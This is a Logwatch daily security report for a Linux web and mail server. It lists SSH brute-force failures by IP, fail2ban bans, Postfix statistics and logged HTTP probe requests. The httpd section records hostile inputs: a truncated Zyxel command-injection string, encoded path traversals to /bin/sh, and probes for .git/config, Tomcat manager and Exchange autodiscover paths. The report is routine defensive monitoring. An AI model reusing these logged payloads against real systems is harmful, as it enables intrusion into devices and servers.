[TOPF] Logwatch for h2361197.stratoserver.net (Linux)

################### Logwatch 7.4.0 (03/01/11) #################### Processing Initiated: Mon Apr 8 04:42:03 2024 Date Range Processed: yesterday ( 2024-Apr-07 ) Period is day. Detail Level of Output: 0 Type of Output/Format: mail / text Logfiles for Host: h2361197.stratoserver.net ################################################################## --------------------- fail2ban-messages Begin ------------------------ Banned services with Fail2Ban: Bans:Unbans ssh: [ 26:26 ] ---------------------- fail2ban-messages End ------------------------- --------------------- httpd Begin ------------------------ Connection attempts using mod_proxy: 148.135.35.230 -> 81.169.150.252:443: 1 Time(s) 45.125.66.34 -> google.com:443: 1 Time(s) 87.121.69.52 -> google.com:443: 4 Time(s) A total of 6 sites probed the server 164.52.0.94 192.241.236.73 205.210.31.217 45.95.169.184 64.62.156.79 78.153.140.179 Requests with error response codes 400 Bad Request null: 8 Time(s) *: 5 Time(s) google.com:443: 5 Time(s) /: 3 Time(s) /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${I ... }zyxel.selfrep;: 2 Time(s) /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%3 ... 5%%32%65/bin/sh: 1 Time(s) /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2 ... %2e/.%2e/bin/sh: 1 Time(s) /manager/html: 1 Time(s) /manager/text/list: 1 Time(s) 81.169.150.252:443: 1 Time(s) H\x1E9#Y\xEE8\xCBm\xCE\x81T\xB2L\x16\xEB\x ... C0\xAE\xC0+\xC0: 1 Time(s) Mb\x80=|\xADXj\x8C\x9BB\xCC}\x9A\xC4MkE\xF ... C0\xAE\xC0+\xC0: 1 Time(s) \x82\xE9\xEDg5M-\x94<y\x909\x82\x0Cve\xE1\ ... C0\xAE\xC0+\xC0: 1 Time(s) \xAD\x00\xA6\xA6<3\xAF\xF4m\xAC\x82\x06\xF ... C\x00<\x00/\x00: 1 Time(s) \xC1\xCB\x15\xBB\xF97\xC7\xC4\x7F?\xBA\xF2 ... C\x00<\x00/\x00: 1 Time(s) \xC5.&D\xF8~Q\xA1Z\x11\xAA\xDD\xAD\xA9\xB8 ... xD8\xF7\x1F\xF9: 1 Time(s) \xD1: 1 Time(s) \xDC\x98\xC9\x95_[*\xC4\xCA\x9F\x1D\xB7iX\ ... C0$\x13\x05\xC0: 1 Time(s) dd\x0F-\xD5.\xE0\xDB\xCD\xB72\xFD\xD7'\xB2 ... x13\xC0\x11\x00: 1 Time(s) mstshash=Administr: 1 Time(s) 500 Internal Server Error /: 9 Time(s) /.git/config: 1 Time(s) /?XDEBUG_SESSION_START=phpstorm: 1 Time(s) /actuator/gateway/routes: 1 Time(s) /autodiscover/autodiscover.json?@zdi/Powershell: 1 Time(s) /favicon.ico: 1 Time(s) /geoserver/web/: 1 Time(s) /version: 1 Time(s) /vpnsvc/connect.cgi: 1 Time(s) /webui/: 1 Time(s) 502 Bad Gateway /register/pdf: 1 Time(s) ---------------------- httpd End ------------------------- --------------------- pam_unix Begin ------------------------ sshd: Authentication Failures: root (170.64.230.199): 118 Time(s) root (183.81.169.238): 34 Time(s) root (179.43.180.106): 33 Time(s) root (212.70.149.150): 14 Time(s) unknown (212.70.149.150): 10 Time(s) unknown (185.156.72.81): 9 Time(s) unknown (170.64.200.50): 7 Time(s) unknown (fixed-186-96-145-241.totalplay.net): 7 Time(s) root (104-230-097-051.res.spectrum.com): 6 Time(s) root (113.106.88.146): 6 Time(s) root (175.206.80.31): 6 Time(s) root (175.4.27.65): 6 Time(s) root (185.232.136.141): 6 Time(s) root (222.73.134.197): 6 Time(s) unknown (210.97.49.3): 6 Time(s) root (170.64.200.50): 5 Time(s) root (193.222.96.178): 5 Time(s) root (221.163.71.185): 5 Time(s) root (59.21.213.225): 5 Time(s) root (61.157.177.227): 5 Time(s) unknown (170.64.230.199): 4 Time(s) unknown (185.196.8.151): 3 Time(s) unknown (221.149.13.65): 3 Time(s) root (185.156.72.81): 2 Time(s) root (198.167.192.65): 2 Time(s) root (61.74.14.153): 2 Time(s) unknown (198.167.192.65): 2 Time(s) unknown (31.184.198.71): 2 Time(s) root (1.31.87.230): 1 Time(s) root (201.234.106.218): 1 Time(s) root (219-89-197-82.adsl.xtra.co.nz): 1 Time(s) root (31.184.198.71): 1 Time(s) unknown (047-051-249-162.biz.spectrum.com): 1 Time(s) unknown (1.235.192.131): 1 Time(s) unknown (106.12.174.50): 1 Time(s) unknown (111.26.196.121): 1 Time(s) unknown (112.26.99.92): 1 Time(s) unknown (113.140.95.250): 1 Time(s) unknown (119.18.84.53): 1 Time(s) unknown (122.180.244.38): 1 Time(s) unknown (191.36.151.234): 1 Time(s) unknown (191.36.154.175): 1 Time(s) unknown (194.30.115.114): 1 Time(s) unknown (200.241.185.115): 1 Time(s) unknown (200.91.234.36): 1 Time(s) unknown (202.70.36.122): 1 Time(s) unknown (203.116.95.48): 1 Time(s) unknown (220.95.14.102): 1 Time(s) unknown (223.83.138.102): 1 Time(s) unknown (41.193.50.163): 1 Time(s) unknown (47.185.58.2): 1 Time(s) unknown (47.187.182.21): 1 Time(s) unknown (49.248.46.2): 1 Time(s) unknown (50.223.176.171): 1 Time(s) unknown (61-219-82-123.hinet-ip.hinet.net): 1 Time(s) unknown (65.20.143.108): 1 Time(s) unknown (91.218.160.238): 1 Time(s) unknown (94.203.171.157): 1 Time(s) unknown (c-98-244-20-77.hsd1.ca.comcast.net): 1 Time(s) unknown (host-176-36-164-107.b024.la.net.ua): 1 Time(s) unknown (wsip-184-185-103-69.oc.oc.cox.net): 1 Time(s) Invalid Users: Unknown Account: 86 Time(s) systemd-user: Unknown Entries: session opened for user root by (uid=0): 1 Time(s) ---------------------- pam_unix End ------------------------- --------------------- Postfix Begin ------------------------ 10 Miscellaneous warnings 1.620K Bytes accepted 1,659 ======== ================================================== 1 Accepted 100.00% -------- -------------------------------------------------- 1 Total 100.00% ======== ================================================== 1 4xx Reject relay denied 100.00% -------- -------------------------------------------------- 1 Total 4xx Rejects 100.00% ======== ================================================== 307 Connections 36 Connections lost (inbound) 307 Disconnections 1 Removed from queue 1 Sent via SMTP 2 SMTP dialog errors 2 Hostname verification errors (FCRDNS) ---------------------- Postfix End ------------------------- --------------------- rsyslogd Begin ------------------------ **** Unmatched entries **** [origin software="rsyslogd" swVersion="8.4.2" x-pid="216" x-info="http://www.rsyslog.com"] exiting on signal 15. : 1 Times ---------------------- rsyslogd End ------------------------- --------------------- Connections (secure-log) Begin ------------------------ **Unmatched Entries** systemd-logind: New seat seat0.: 1 Time(s) ---------------------- Connections (secure-log) End ------------------------- --------------------- sendmail-largeboxes (large mail spool files) Begin ------------------------ Large Mailbox threshold: 40MB (41943040 bytes) Warning: Large mailbox: mailman.gz (1747199807) Warning: Large mailbox: mailman (235703599967) ---------------------- sendmail-largeboxes (large mail spool files) End ------------------------- --------------------- SSHD Begin ------------------------ SSHD Killed: 1 Time(s) SSHD Started: 2 Time(s) Disconnecting after too many authentication failures for user: invalid : 1 Time(s) root : 5 Time(s) Failed logins from: 1.31.87.230: 1 time 31.184.198.71: 1 time 59.21.213.225: 6 times 61.74.14.153: 2 times 61.157.177.227 (227.177.157.61.dial.dy.sc.dynamic.163data.com.cn): 5 times 104.230.97.51 (104-230-097-051.res.spectrum.com): 6 times 113.106.88.146: 6 times 170.64.200.50: 5 times 170.64.230.199: 118 times 175.4.27.65: 6 times 175.206.80.31: 6 times 179.43.180.106 (hostedby.privatelayer.com): 33 times 183.81.169.238: 34 times 185.156.72.81: 2 times 185.232.136.141: 6 times 193.222.96.178: 5 times 198.167.192.65: 2 times 201.234.106.218 (201-234-106-218.static.impsat.net.ar): 1 time 212.70.149.150: 14 times 219.89.197.82 (219-89-197-82.adsl.xtra.co.nz): 1 time 221.163.71.185: 6 times 222.73.134.197: 6 times Illegal users from: 2001:470:1:332::7 (scan-41af.shadowserver.org): 1 time undef: 38 times 1.235.192.131: 1 time 31.184.198.71: 3 times 41.193.50.163: 1 time 47.51.249.162 (047-051-249-162.biz.spectrum.com): 1 time 47.185.58.2: 1 time 47.187.182.21: 1 time 49.248.46.2 (static-2.46.248.49-tataidc.co.in): 1 time 50.223.176.171: 1 time 61.219.82.123 (61-219-82-123.hinet-ip.hinet.net): 1 time 64.62.156.102 (scan-66-8.shadowserver.org): 1 time 65.20.143.108: 1 time 79.136.112.163 (h-79-136-112-163.A139.corp.bahnhof.se): 1 time 91.218.160.238: 1 time 94.203.171.157: 1 time 98.244.20.77 (c-98-244-20-77.hsd1.ca.comcast.net): 1 time 106.12.174.50: 1 time 111.26.196.121: 1 time 112.26.99.92: 1 time 113.140.95.250: 1 time 119.18.84.53: 5 times 122.180.244.38 (abts-north-static-38.244.180.122.airtelbroadband.in): 1 time 170.64.200.50: 8 times 170.64.230.199: 4 times 176.36.164.107 (host-176-36-164-107.b024.la.net.ua): 1 time 184.185.103.69 (wsip-184-185-103-69.oc.oc.cox.net): 1 time 185.156.72.81: 9 times 185.196.8.151: 3 times 186.96.145.241 (fixed-186-96-145-241.totalplay.net): 7 times 191.36.151.234 (vipturbo.com.br): 1 time 191.36.154.175 (vipturbo.com.br): 1 time 194.30.115.114 (194_30_115_114_CESP0009.lpp_za_bi.ips.sarenet.es): 1 time 198.167.192.65: 2 times 200.91.234.36 (desenliste.ifxcorp.com): 1 time 200.241.185.115: 1 time 202.70.36.122: 1 time 202.175.76.242 (z76l242.static.ctm.net): 1 time 203.116.95.48: 1 time 210.97.49.3: 6 times 212.70.149.150: 11 times 220.95.14.102: 1 time 221.149.13.65: 3 times 223.83.138.102: 1 time Users logging in through sshd: root: 77.181.66.113 (dynamic-077-181-066-113.77.181.pool.telefonica.de): 1 time **Unmatched Entries** Disconnecting: Change of username or service not allowed: (0,ssh-connection) -> (root,ssh-connection) [preauth] : 1 time(s) Disconnecting: Protocol error: expected packet type 21, got 20 [preauth] : 2 time(s) Disconnecting: Change of username or service not allowed: (admin,ssh-connection) -> (ubnt,ssh-connection) [preauth] : 1 time(s) Disconnecting: Change of username or service not allowed: (root,ssh-connection) -> (admin,ssh-connection) [preauth] : 1 time(s) ---------------------- SSHD End ------------------------- --------------------- Disk Space Begin ------------------------ Filesystem Size Used Avail Use% Mounted on /dev/ploop19598p1 394G 243G 132G 65% / none 4.0G 0 4.0G 0% /dev ---------------------- Disk Space End ------------------------- ###################### Logwatch End #########################